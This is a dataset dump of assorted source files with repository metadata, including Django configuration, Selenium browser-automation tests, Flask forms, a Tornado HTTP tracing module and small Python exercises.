if (range == "high" and low >= high) or (range == "low" and low <= high):
print 'STATUS UNKNOWN - Incorrect value for warning and critical threshold'
sys.exit(3)
if argmap["username"] !="":
global username
username = argmap["username"]
if argmap["password"] !="":
global password
password = argmap["password"]
mode = argmap["mode"];
try:
index = listMode[mode];
except:
print "STATUS UNKNOWN - Incorrect value for mode"
sys.exit(3)
hostipaddress = argmap["hostIp"]
logger.debug("Low Threshold:" + str(low))
logger.debug("High Threshold:" + str(high))
logger.debug("Server URL:" + serverUrl)
logger.debug("Host Add" + hostipaddress)
logger.debug("Mode:" + mode)
str = getVolumeState()
print str
sys.exit(stat)
except Exception, err:
logger.error("Error inside get volume stat by controller", exc_info=True)
print "STATUS UNKNOWN"
sys.exit(3)
| [
"jean-louis@dupond.be"
] | jean-louis@dupond.be |
c2c55f13363e0c2423791f7715fdf6adfb225420 | ee51f91d1ee883fd84b36c10b97c3dcee8f6f7fa | /ProTwo/AppTwo/urls.py | fadd7f64a272d643b8bdc7edd804ab26c382fa4f | [
"MIT"
] | permissive | imrk97/Learning_django | 4d27e7d28266383d925b5da87fda39d6ec0ec277 | 6f19dc1c69846feda67cccc82269f0aa70f911bc | refs/heads/master | 2020-05-03T09:44:28.887089 | 2019-04-06T16:55:05 | 2019-04-06T16:55:05 | 178,562,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py |
from django.urls import path
from AppTwo import views
urlpatterns = [
path('',views.index,name='anything'),
#path('admin/', admin.site.urls),
] | [
"rohankarmakar97@gmail.com"
] | rohankarmakar97@gmail.com |
ddc08f166cdff4d09ae577eaf421b63c77c68970 | 2d3953d18f08b17851721a9622182f563295cb1d | /channelshowdown/userprofile/migrations/0012_auto_20180328_1645.py | d231a56f23499ecc5159b9980b39a53ed613e124 | [
"MIT"
] | permissive | channelfix/cshowdown-backend | b399a350755bbb9520103568a70ca1e2a1871397 | 4225ad4f2bd56112f627e6fe1f26c281484d804e | refs/heads/master | 2022-12-10T10:22:35.987518 | 2018-08-29T02:50:02 | 2018-08-29T02:50:02 | 122,010,350 | 0 | 0 | MIT | 2022-12-08T00:56:24 | 2018-02-19T02:19:02 | JavaScript | UTF-8 | Python | false | false | 501 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-03-28 16:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('userprofile', '0011_auto_20180328_1240'),
]
operations = [
migrations.AlterField(
model_name='userinfo',
name='user_video',
field=models.FileField(blank=True, default=None, upload_to='profile_video/'),
),
]
| [
"arranbaleva@gmail.com"
] | arranbaleva@gmail.com |
57968c4b0079829bed20ff53911d5d768715b9fd | 7798c5171e4f63b40e9a2d9ae16f4e0f60855885 | /manage.py | b3a505230aac16ae6ce9859ed552d3f4d09d2d80 | [] | no_license | mstepniowski/wffplanner | d2d5ddd2938bd2b7b294332dad0d24fa63c2700a | 62d1d00ca9a546b759e5c394c7a9da06484a7aa3 | refs/heads/master | 2020-05-20T06:04:22.413395 | 2015-10-01T16:12:48 | 2015-10-01T16:12:48 | 6,033,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "wffplanner.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"marek@stepniowski.com"
] | marek@stepniowski.com |
76e2f983d191d20cb046d3673dce23b0cfb5febc | d3e265b206cc1ae7c13470e70248d397a10f3b57 | /selenium_codes/fp_changep-4.py | 539542c9d12f34b45ea30875df2a55b0c4b59f93 | [] | no_license | aishwar18/Profile-Builder | 2b30dbc2dd2808a45305c0fda5d5e7eb468b427d | 01e1260fe5392046404457f90176cb5214076231 | refs/heads/main | 2023-06-01T23:33:30.986554 | 2021-06-18T12:03:45 | 2021-06-18T12:03:45 | 340,952,643 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,690 | py | #forgot password change password having password mismatch
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
PATH="C:\Program Files (x86)\chromedriver.exe"
driver=webdriver.Chrome(PATH)
driver.maximize_window()
driver.get("http://127.0.0.1:8000/html/login")
try:
link=driver.find_element_by_xpath("//a[contains(@href ,'/html/forgotPassword')]")
time.sleep(2)
print("clicked on the forgot password page")
link.click()
username=driver.find_elements_by_name("username")
time.sleep(2)
username[0].send_keys("aditya")
time.sleep(2)
submit=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
time.sleep(2)
submit[0].click()
time.sleep(2)
print("entered security question page")
answer=driver.find_elements_by_name("answer")
answer[0].send_keys("percy jackson")
sub=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
time.sleep(2)
sub[0].click()
newp=driver.find_elements_by_name("newPassword")
time.sleep(2)
newp[0].send_keys("Qwerty11")
confirmp=driver.find_elements_by_name("confirmPassword")
time.sleep(2)
confirmp[0].send_keys("Aditya11")
sub=driver.find_elements_by_xpath("//div[contains(@class ,'PR_button')]")
time.sleep(2)
sub[0].click()
time.sleep(4)
driver.quit()
except Exception as e:
print("exception found",format(e))
print("failed to navigate to registration page")
time.sleep(4)
driver.quit()
| [
"noreply@github.com"
] | aishwar18.noreply@github.com |
78a434798c5ff1b702e86b60098a0df79508e712 | ecafb17f9b2cbd37fb223743f47ba130b0977914 | /pyesst/chapter5.py | effd23dae191ad2f0bdd8fbbec8ccc4e928f260f | [] | no_license | modevops/python_practice | 0088d322230932e3562f48edeadd87dd1f517332 | 67d2845df46e6815ac052ac935868cdd29ac681d | refs/heads/master | 2022-04-18T17:00:13.013226 | 2020-04-10T14:08:40 | 2020-04-10T14:08:40 | 254,648,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py | #!/usr/bin/env python3
# Copyright 2009-2017 BHG http://bw.org/
x = 0x0a
y = 0x02
z = x & y
print(f'(hex) x is {x:02x}, y is {y:02x}, z is {z:02x}')
print(f'(bin) x is {x:08b}, y is {y:08b}, z is {z:08b}') | [
"modevops@Marcuss-MacBook-Pro.local"
] | modevops@Marcuss-MacBook-Pro.local |
db7a73788447c9b2c49c39cac65eef68a35a17fd | 131bd461db24a7a18397f0755019f50fdb938d51 | /Tugas/differensiasi numerik/selisih tengah.py | 8c2ae498e994e9f59552de1762925e3d755f1f90 | [] | no_license | sasaputra/MetodeNumerikGanjil-21-22 | f4ef309eee7c53a8adc21998f3a5df4c281b70d4 | f5be7d7857d2b182e4f597ce92d66a14c247a325 | refs/heads/main | 2023-08-13T03:52:49.782526 | 2021-10-15T01:27:48 | 2021-10-15T01:27:48 | 402,184,720 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | import numpy as np
import math
def f(x):
return(np.exp(-x)*math.sin(2*x) + 1)
def turunan(x0,h):
step = 1
condition = true
x0 = 1
h = 0.1
err = 1000
dfxold = 1000
while err>=0.00001:
dfx = (f(x0+h)-f(x0-h)/2*h)
err = abs(dfxold -dfx)
dfxold=dfx
h = h/2
print ("the center derivative at x= with specifed accuracy is")
print (dfx)
| [
"noreply@github.com"
] | sasaputra.noreply@github.com |
f33cadde9c67f29e40284675b8066ac3dd49004f | 521b0719fa42009207b5080b4a3b075c8ff157a0 | /application/species/forms.py | 81c194b9c071a55385f8039849440c9a5e97e565 | [] | no_license | teemuoksanen/lintuhavainnot | 41e0e970e5a534374777926fb055640f2a6351a9 | 170fc08f07e724f3caa85de7b7df72ad200b995c | refs/heads/master | 2022-10-04T15:49:16.288249 | 2020-06-08T13:01:07 | 2020-06-08T13:01:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,360 | py | from flask_wtf import FlaskForm
from wtforms import StringField, TextAreaField, SelectField, validators
conservChoices = [(1, "Elinvoimainen"), (2, "Silmälläpidettävä"),
(3, "Vaarantunut"), (4, "Erittäin uhanalainen"), (5, "Äärimmäisen uhanalainen")]
class SpeciesCreationForm(FlaskForm):
name = StringField("Lajinimi, kansakielinen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
species = StringField("Lajinimi, tieteellinen kaksiosainen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_genus = StringField("Suku:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_family = StringField("Heimo:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_order = StringField("Lahko:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
conserv_status = SelectField("Uhanalaisuusluokitus:", choices=conservChoices, coerce=int)
info = TextAreaField("Lajikuvaus:", render_kw={"rows": 10, "cols": 30})
class Meta:
csrf = False
class SpeciesEditForm(FlaskForm):
name = StringField("Lajinimi, kansakielinen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
species = StringField("Lajinimi, tieteellinen kaksiosainen:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_genus = StringField("Suku:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_family = StringField("Heimo:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
sp_order = StringField("Lahko:", [validators.Length(min=1, max=255, message="Kentän tulee sisältää vähintään %(min)d ja enintään %(max)d merkkiä.")])
conserv_status = SelectField("Uhanalaisuusluokitus:", choices=conservChoices, coerce=int)
info = TextAreaField("Lajikuvaus:", render_kw={"rows": 10, "cols": 30})
class Meta:
csrf = False
class SearchSpecies(FlaskForm):
fieldChoices = [("all", "Kaikki kentät"), ("name", "Lajinimi"),
("species", "Tieteellinen nimi"), ("sp_genus", "Suku"), ("sp_family", "Heimo"),
("sp_order", "Lahko"), ("info", "Lajikuvaus")]
conservChoices2 = [("0", "Älä rajaa uhanalaisuuden perusteella"), ("1", "Elinvoimainen"),
("2", "Silmälläpidettävä"), ("3", "Vaarantunut"), ("4", "Erittäin uhanalainen"),
("5", "Äärimmäisen uhanalainen")]
column = SelectField("Minkä kentän perusteella haetaan?", choices = fieldChoices)
searchword = StringField("Hakusana (jätä tyhjäksi, jos et halua hakea hakusanan perusteella):", [validators.Length(max=255, message="Kentän tulee olla enintään %(max)d merkkiä pitkä.")])
conservStatus = SelectField("Uhanalaisuusluokitus:", choices=conservChoices2)
class Meta:
csrf = False
| [
"sonja.t.heikkinen@hotmail.com"
] | sonja.t.heikkinen@hotmail.com |
945d9d0dbf297f3e00334a032fd8cd7922a9654e | 6cd87462fd9b5ee575aee281f6d2e4be5391ea92 | /apps/twitter/admin.py | f4524da329c2671ab002a1df4a319053a229dfa3 | [] | no_license | mo-mughrabi/djsocial | 912413574fd7ce943387dbd5744f05ec8ca57f48 | 060c0a8e0db848879dfaeb4c6f44f1dba7a39aea | refs/heads/master | 2016-09-16T10:46:05.853935 | 2014-03-13T19:14:41 | 2014-03-13T19:14:41 | 16,213,862 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | # -*- coding: utf-8 -*-
from django.contrib import admin
from models import Twitter, ScheduleOrder, Order
class TwitterAdmin(admin.ModelAdmin):
list_display = ('user', 'tid', 'screen_name','followers_sum', 'following_sum')
# Now register the new TwitterAdmin...
admin.site.register(Twitter, TwitterAdmin)
class ScheduleOrderAdmin(admin.ModelAdmin):
list_display = ('user', 'label', 'status','created_at', 'last_run')
admin.site.register(ScheduleOrder, ScheduleOrderAdmin)
class OrderAdmin(admin.ModelAdmin):
list_display = ('user', 'schedule_order', 'status','created_at', 'executed_at')
admin.site.register(Order, OrderAdmin) | [
"="
] | = |
1a0e819271efbd2f4c12221045d0550048b59bcb | abee40ec5a102a045ac90c8f539868f328d3bc95 | /3-chapter/maitreD'.py | 9f602684cc9512b408afa533ae09edb41c6c7fd0 | [] | no_license | annabalan/pythonFAB | 4ac3ef3d90c98bf939593fd4b0d4dc8fea6d07a0 | 659646c0be2e5a97242cdb1b59942699095177e4 | refs/heads/master | 2021-01-21T16:04:19.025196 | 2018-06-05T05:35:47 | 2018-06-05T05:35:47 | 95,396,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | # Maitre D'
# Demonstrates interpeting any value as a condition (True or False)
print("Welcome to the Chateau D' Food")
print("It seems we are quite full this evening.\n")
money = int(input("How many dollars do you slip the Maitre D'? "))
if money:
print("Ah, I am reminded of a table, Right this way.")
else:
print("Please, sit. It may be a while.")
input("\n\nPress the enter key to exit.")
| [
"colnyshkasmile@gmail.com"
] | colnyshkasmile@gmail.com |
4a2d4fecf255307e71b25519413f146f1bdacfd9 | 56b36ddf920b5f43e922cb84e8f420f1ad91a889 | /Leetcode/Leetcode - Premium/Mock Interview/isSubsequence.py | 053496e29b0e65f9a467defbd48dcafc83eb967e | [] | no_license | chithien0909/Competitive-Programming | 9ede2072e85d696ccf143118b17638bef9fdc07c | 1262024a99b34547a3556c54427b86b243594e3c | refs/heads/master | 2022-07-23T16:47:16.566430 | 2020-05-12T08:44:30 | 2020-05-12T08:44:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,279 | py | """
Given a string s and a string t, check if s is subsequence of t.
You may assume that there is only lower case English letters in both s and t. t is potentially a very long (length ~= 500,000) string, and s is a short string (<=100).
A subsequence of a string is a new string which is formed from the original string by deleting some (can be none) of the characters without disturbing the relative positions of the remaining characters. (ie, "ace" is a subsequence of "abcde" while "aec" is not).
Example 1:
s = "abc", t = "ahbgdc"
Return true.
Example 2:
s = "axc", t = "ahbgdc"
Return false.
Follow up:
If there are lots of incoming S, say S1, S2, ... , Sk where k >= 1B, and you want to check one by one to see if T has its subsequence. In this scenario, how would you change your code?
Credits:
Special thanks to @pbrother for adding this problem and creating all test cases.
"""
class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if len(s) == 0: return True
curS, curT= 0, 0
while curT <= len(t) - 1:
if s[curS] == t[curT]:
curS+=1
if curS == len(s):
return True
curT+=1
return curS == l
s = Solution()
print(s.isSubsequence("abc","ahbgdc")) | [
"ntle1@pipeline.sbcc.edu"
] | ntle1@pipeline.sbcc.edu |
62b02423e22f441caad82e24c1757d28909767d9 | 73dd4cd6e08c09242e5a486dce03ef37a1160e83 | /create_general_model5.py | bd4f7500a188c675303ae43b1f0875fb7006b9a6 | [] | no_license | zhangfeiyang/mm-trigger2 | 8d429344bbfdf01bd278eb426117b55650c2ec5e | 2b99cc03a61c828a0f0ed7c6298e4074af5462e0 | refs/heads/master | 2020-06-02T13:56:38.789337 | 2019-06-11T14:09:41 | 2019-06-11T14:09:41 | 191,178,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | #!/usr/bin/python3
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
#import matplotlib.pyplot as plt
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Input, Concatenate, Lambda
from tensorflow.keras import optimizers
from tensorflow.python.framework import ops
from tensorflow.keras.layers import Activation
from tensorflow.keras import backend as K
from tensorflow.keras import backend as K
def custom_activation(x):
#return K.sigmoid(x)
return K.exp(x)
def create_model():
model = keras.Sequential([
keras.layers.Flatten(input_shape=(325, )),
keras.layers.Dense(100, activation=tf.nn.relu),
keras.layers.Dense(100, activation=custom_activation),
keras.layers.Dense(50, activation=tf.nn.softsign),
keras.layers.Dense(10, activation=tf.nn.relu),
keras.layers.Dense(2, activation=tf.nn.softmax)
])
return model
if __name__ == "__main__":
model = create_model()
model.summary()
| [
"1173205582@qq.com"
] | 1173205582@qq.com |
b28d0abd6a484e23c277ddb74ecf8140c4ca1fe5 | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code308RangeSumQuery2DMutable.py | f914f056042314c3f89d84a5b8ddf3bfe388b092 | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,454 | py | """
308. Range Sum Query 2D - Mutable
Given a 2D matrix matrix, find the sum of the elements inside the rectangle defined by its upper left corner (row1, col1) and lower right corner (row2, col2).
The above rectangle (with the red border) is defined by (row1, col1) = (2, 1) and (row2, col2) = (4, 3), which contains sum = 8.
Example:
Given matrix = [
[3, 0, 1, 4, 2],
[5, 6, 3, 2, 1],
[1, 2, 0, 1, 5],
[4, 1, 0, 1, 7],
[1, 0, 3, 0, 5]
]
sumRegion(2, 1, 4, 3) -> 8
update(3, 2, 2)
sumRegion(2, 1, 4, 3) -> 10
Note:
The matrix is only modifiable by the update function.
You may assume the number of calls to update and sumRegion function is distributed evenly.
You may assume that row1 ≤ row2 and col1 ≤ col2.
"""
"""
Similar problem: 304 Range Sum Query 2D - Immutable
Use Binary Index Tree (BIT) to quickly get the sum of the rectangle area from (0, 0) to (row, col), inclusive
"""
import unittest
class NumMatrix:
def __init__(self, matrix):
self.M = len(matrix)
self.N = len(matrix[0]) if self.M > 0 else 0
self.mat = [[0]*self.N for _ in range(self.M)] # (M)*(N) matrix that stores current value (update method may change value)
self.bit = [[0]*(self.N+1) for _ in range(self.M+1)] # (M+1)*(N+1) matrix that represents a 2-D BIT
# use update method to create the 2-D BIT
for i in range(self.M):
for j in range(self.N):
self.update(i, j, matrix[i][j])
def update(self, row: int, col: int, val: int) -> None:
if -1 < row < self.M and -1 < col < self.N:
diff = val - self.mat[row][col]
self.mat[row][col] = val
i = row + 1 # mat has 0-based index and BIT has 1-based index. Pitfall: don't initialize j to (col + 1) here
while i < self.M + 1:
j = col + 1
while j < self.N + 1:
self.bit[i][j] += diff
j += j & (-j)
i += i & (-i)
def getSum(self, row: int, col: int) -> int:
"""
sum of the rectangle area from (0, 0) to (row, col), exclusive row & col
"""
res = 0
if -1 < row - 1 < self.M and -1 < col - 1 < self.N:
i = row
while i > 0:
j = col
while j > 0:
res += self.bit[i][j]
j -= j & (-j)
i -= i & (-i)
return res
def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:
return self.getSum(row2+1, col2+1)\
- self.getSum(row2+1, col1)\
- self.getSum(row1, col2+1)\
+ self.getSum(row1, col1)
# Your NumMatrix object will be instantiated and called as such:
# obj = NumMatrix(matrix)
# obj.update(row,col,val)
# param_2 = obj.sumRegion(row1,col1,row2,col2)
class Test(unittest.TestCase):
def test_1(self):
matrix = [[3, 0, 1, 4, 2],\
[5, 6, 3, 2, 1],\
[1, 2, 0, 1, 5],\
[4, 1, 0, 1, 7],\
[1, 0, 3, 0, 5]]
#matrix = [[3, 0], [5, 6]]
m = NumMatrix(matrix)
self.assertEqual(14, m.getSum(2, 2))
self.assertEqual(8, m.sumRegion(2, 1, 4, 3))
m.update(3, 2, 2)
self.assertEqual(10, m.sumRegion(2, 1, 4, 3))
if __name__ == "__main__":
unittest.main(exit = False) | [
"guoligit@gmail.com"
] | guoligit@gmail.com |
cf7b634e86403bc6e74ea6701c60c1c423198ef8 | c29d81a381a70be0fbaf10e94bdf6f57f7a1ba21 | /lab3.py | 1a421553cb7bae7eb6cacd819f7ac2d85a39e50c | [] | no_license | veefore/avip | 2b27ccca8ad4923318b7d9ad1f58e756306f33cf | 94c3ff30c2589829b4854442f40bedeba8ce32fc | refs/heads/master | 2021-01-13T23:53:27.597427 | 2020-06-06T03:32:21 | 2020-06-06T03:32:21 | 242,532,873 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | from PIL import Image
import numpy as np
from utils import print_timing
from lab1 import greyscale
def aperture_to_array(pixels, x, y, a):
# (x, y) represents the top left corner of the window, where (0, 0) is at the top left of the image
# a - the side of the window
arr = np.zeros((a, a))
for shift_x in range(a):
for shift_y in range(a):
arr[shift_x][shift_y] = int(pixels[x + shift_x, y + shift_y])
return arr
@print_timing
def calculate_gradients(image):
Gx_mask = np.array([[-1, -1, -1, -1, -1],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[1, 1, 1, 1, 1]])
Gy_mask = np.rot90(Gx_mask, 1)
size0 = image.size[0] - 4
size1 = image.size[1] - 4
Gx = np.empty((size0, size1), dtype=int)
Gy = np.empty((size0, size1), dtype=int)
G = np.empty((size0, size1), dtype=int)
pixels = image.load()
for h in range(size0):
for w in range(size1):
arr = aperture_to_array(pixels, h, w, 5)
Gx[h][w] = np.sum(np.multiply(Gx_mask, arr))
Gy[h][w] = np.sum(np.multiply(Gy_mask, arr))
G[h][w] = abs(Gx[h][w]) + abs(Gy[h][w])
return (Gx, Gy, G)
def binarize(G, size, threshold):
image = Image.new('1', size)
pixels = image.load()
for h in range(size[0] - 4):
for w in range(size[1] - 4):
if G[h][w] > threshold:
pixels[h, w] = 1
else:
pixels[h, w] = 0
return image
def normalize(array):
min_ = 255 * 5
max_ = -255 * 5
for i in range(array.shape[0]):
for j in range(array.shape[1]):
max_ = max(max_, array[i][j])
min_ = min(min_, array[i][j])
max_ = abs(max_ - min_)
for i in range(array.shape[0]):
for j in range(array.shape[1]):
array[i][j] = (array[i][j] - min_) * 255 / max_
return array
def array_to_image(array):
print(array)
image = Image.new('L', array.shape)
pixels = image.load()
for h in range(array.shape[0]):
for w in range(array.shape[1]):
pixels[h, w] = int(array[h][w])
return image
def grads_to_images(grads):
images = []
for i in range(3):
images.append(array_to_image(normalize(grads[i])))
return images
@print_timing
def outline(image, image_name, threshold, folder_path=None):
grads = calculate_gradients(image)
grad_images = grads_to_images(grads)
if folder_path is not None:
grad_images[0].save(folder_path + "Gx_" + image_name)
grad_images[1].save(folder_path + "Gy_" + image_name)
grad_images[2].save(folder_path + "G_" + image_name)
return binarize(grads[2], image.size, threshold)
def process_image(image_name, threshold, folder_path=None, save=False):
img = Image.open(folder_path + image_name)
greyscale_img = greyscale(img)
if save:
greyscale_img.save(folder_path + "greyscale_" + image_name)
outline(greyscale_img, image_name, threshold, folder_path).save(folder_path + "outlined_" + image_name)
def run_test():
folder_path = "Data/lab3/"
process_image("img1.bmp", 63, folder_path)
process_image("img2.bmp", 115, folder_path)
process_image("img3.bmp", 75, folder_path)
process_image("img4.bmp", 65, folder_path)
#run_test()
| [
"veefore.vs@gmail.com"
] | veefore.vs@gmail.com |
49a3f9e0115ecea2e26d292e39f1d033e9789868 | 9db35c7fee8844d1cc2cdc27898cbdb2bd643fb5 | /main.py | b2e3504df196ddeb9ef36cf595c2dd946ac2ed23 | [] | no_license | UNILORN/SeleniumSample | 1bffca3055f08654872202d131d20bc7d311dac8 | fbb8583d06b053b932c6fe200bbf78ee0a8729f4 | refs/heads/master | 2020-06-02T19:54:33.757503 | 2019-06-11T03:47:36 | 2019-06-11T03:47:36 | 191,289,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 784 | py | from selenium import webdriver
import os
from os.path import abspath,dirname
from random import randrange
from time import sleep
if os.name == 'posix':
path = abspath(dirname(__file__)+'./mac/chromedriver')
else:
path = abspath(dirname(__file__)+'\win\chromedriver.exe')
browser = webdriver.Chrome(executable_path=path)
browser.get('https://www1.shalom-house.jp/komon/')
browser.implicitly_wait(3)
el = browser.find_element_by_id('txtID')
el.send_keys('testtest')
el = browser.find_element_by_id('txtPsw')
el.send_keys('')
# el = browser.find_element_by_id('btnLogin')
# el.click()
# el = browser.find_element_by_id('ctl00_ContentPlaceHolder1_imgBtnSyuugyou')
# el.click()
# el = browser.find_element_by_id('ctl00_ContentPlaceHolder1_ibtnIn3')
# el.click()
# browser.close() | [
"yusuke.aoki@optim.co.jp"
] | yusuke.aoki@optim.co.jp |
34443723d6fcf2aed884d9aa89f7d0734540bf52 | 05a95cde87ae2d1f33b0886b36625684fcdb635e | /epsagon/events/tornado_client.py | f036e51142ed80e8285b9ffe24bad4b5b93576a9 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | epsagon/epsagon-python | eba6feae2ee04d1ee66e08b0b6eedf9473ba9058 | 91e28fe43bc4f42152fb156145088cb8c9f69b85 | refs/heads/master | 2023-05-24T05:38:40.625407 | 2022-11-10T12:34:50 | 2022-11-10T12:34:50 | 150,960,938 | 57 | 25 | MIT | 2023-05-12T22:38:08 | 2018-09-30T11:21:41 | Python | UTF-8 | Python | false | false | 4,790 | py | """
Tornado AsyncHTTPClient events module.
"""
from __future__ import absolute_import
import functools
try:
from urllib.parse import urlparse, urlunparse
except ImportError:
from urlparse import urlparse, urlunparse
import traceback
from uuid import uuid4
from epsagon.utils import add_data_if_needed
from ..trace import trace_factory
from ..event import BaseEvent
from ..http_filters import (
is_blacklisted_url,
is_payload_collection_blacklisted
)
from ..utils import update_http_headers, normalize_http_url
from ..constants import HTTP_ERR_CODE, EPSAGON_HEADER_TITLE
class TornadoAsyncHTTPClientEvent(BaseEvent):
"""
Represents base request event.
"""
ORIGIN = 'tornado_client'
RESOURCE_TYPE = 'http'
# pylint: disable=W0613
def __init__(self, wrapped, instance, args, kwargs, start_time, response,
exception):
"""
Initialize.
:param wrapped: wrapt's wrapped
:param instance: wrapt's instance
:param args: wrapt's args
:param kwargs: wrapt's kwargs
:param start_time: Start timestamp (epoch)
:param response: response data
:param exception: Exception (if happened)
"""
super(TornadoAsyncHTTPClientEvent, self).__init__(start_time)
self.event_id = 'tornado-client-{}'.format(str(uuid4()))
request = args[0]
headers = dict(request.headers)
if headers:
# Make sure trace ID is present in case headers will be removed.
epsagon_trace_id = headers.get(EPSAGON_HEADER_TITLE)
if epsagon_trace_id:
self.resource['metadata']['http_trace_id'] = epsagon_trace_id
parsed_url = urlparse(request.url)
host_url = parsed_url.netloc.split(':')[0]
full_url = urlunparse((
parsed_url.scheme,
host_url,
parsed_url.path,
parsed_url.params,
parsed_url.query,
parsed_url.fragment,
))
self.resource['name'] = normalize_http_url(request.url)
self.resource['operation'] = request.method
self.resource['metadata']['url'] = request.url
if not is_payload_collection_blacklisted(full_url):
add_data_if_needed(
self.resource['metadata'],
'request_headers',
headers
)
body = request.body
if isinstance(body, bytes):
body = body.decode('utf-8')
if body:
add_data_if_needed(
self.resource['metadata'],
'request_body',
body
)
if response is not None:
callback = functools.partial(self.update_response)
response.add_done_callback(callback)
if exception is not None:
self.set_exception(exception, traceback.format_exc())
def update_response(self, future):
"""
Adds response data to event.
:param future: Future response object
:return: None
"""
response = future.result()
self.resource['metadata']['status_code'] = response.code
self.resource = update_http_headers(
self.resource,
dict(response.headers)
)
full_url = self.resource['metadata']['url']
if not is_payload_collection_blacklisted(full_url):
add_data_if_needed(
self.resource['metadata'],
'response_headers',
dict(response.headers)
)
body = response.body
if isinstance(body, bytes):
try:
body = body.decode('utf-8')
except UnicodeDecodeError:
body = str(body)
if body:
add_data_if_needed(
self.resource['metadata'],
'response_body',
body
)
# Detect errors based on status code
if response.code >= HTTP_ERR_CODE:
self.set_error()
class TornadoClientEventFactory(object):
"""
Factory class, generates AsyncHTTPClient event.
"""
@staticmethod
def create_event(wrapped, instance, args, kwargs, start_time, response,
exception):
"""
Create an AsyncHTTPClient event.
"""
# Detect if URL is blacklisted, and ignore.
if is_blacklisted_url(args[0].url):
return
event = TornadoAsyncHTTPClientEvent(
wrapped,
instance,
args,
kwargs,
start_time,
response,
exception
)
trace_factory.add_event(event)
| [
"noreply@github.com"
] | epsagon.noreply@github.com |
1692a2ec3f66ebf1aa86968ae915f2a2e635e5cd | 9a7526401349d6004a0ffb94163e75b368e064a1 | /CoffeeCartServer/testMain.py | 539dd8faf0cfc1ca531070bda379bd3ed131f2aa | [] | no_license | jassimran/Coffee-Cart-App | 2ab70d3e4645be4f595b0ff923aab5f90a818616 | 0b187fa82c0cfbfa0384100d0ca2e0dd338e95c0 | refs/heads/master | 2020-03-14T02:26:37.356816 | 2018-04-28T10:27:57 | 2018-04-28T10:27:57 | 131,398,922 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 990 | py | #!/usr/bin/python
import optparse
import sys
import unittest
USAGE = """%prog SDK_PATH TEST_PATH
Run unit tests for App Engine apps.
SDK_PATH Path to the SDK installation
TEST_PATH Path to package containing test modules"""
def main(sdk_path, test_path):
sys.path.insert(0, sdk_path)
import dev_appserver
dev_appserver.fix_sys_path()
suite = unittest.loader.TestLoader().discover(test_path, pattern='*TestCases.py')
unittest.TextTestRunner(stream=sys.stdout, verbosity=2).run(suite)
if __name__ == '__main__':
parser = optparse.OptionParser(USAGE)
options, args = parser.parse_args()
if len(args) == 0:
#parser.print_help()
SDK_PATH = "/usr/local/google_appengine"
TEST_PATH = "./UnitTest"
print ('Using default paths\n sdk:%s\n test:%s' % (SDK_PATH, TEST_PATH))
else:
SDK_PATH = args[0]
TEST_PATH = args[1]
main(SDK_PATH, TEST_PATH)
| [
"just.simmi@gmail.com"
] | just.simmi@gmail.com |
